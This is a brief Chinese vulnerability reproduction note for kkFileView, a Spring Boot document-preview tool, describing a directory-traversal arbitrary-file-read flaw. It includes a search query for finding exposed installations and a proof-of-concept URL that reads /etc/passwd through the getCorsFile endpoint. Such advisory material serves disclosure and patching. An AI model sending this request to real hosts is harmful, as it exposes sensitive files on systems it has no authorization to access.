一、kkFileview简介
kkFileView,一款成熟且开源的文件文档在线预览项目解决方案。kkFileView为文件文档在线预览解决方案,该项目使用流行的spring boot搭建,易上手和部署,基本支持主流办公文档的在线预览,如doc,docx,xls,xlsx,ppt,pptx,pdf,txt,zip,rar,图片,视频,音频等等。
二、漏洞描述
Keking KkFileview是中国凯京科技(Keking)公司的一个 Spring-Boot 打造文件文档在线预览项目。
Keking kkFileview 存在安全漏洞,该漏洞源于存在通过目录遍历漏洞读取任意文件,可能导致相关主机上的敏感文件泄漏。
三、查询语句
body=“kkFileView”
四、漏洞复现
1、访问漏洞地址
2、利用如下POC,成功复现获取数据
http://127.0.0.1/getCorsFile?urlPath=file:///etc/passwd
五、修复建议
目前厂商已经发布升级补丁以修复漏洞。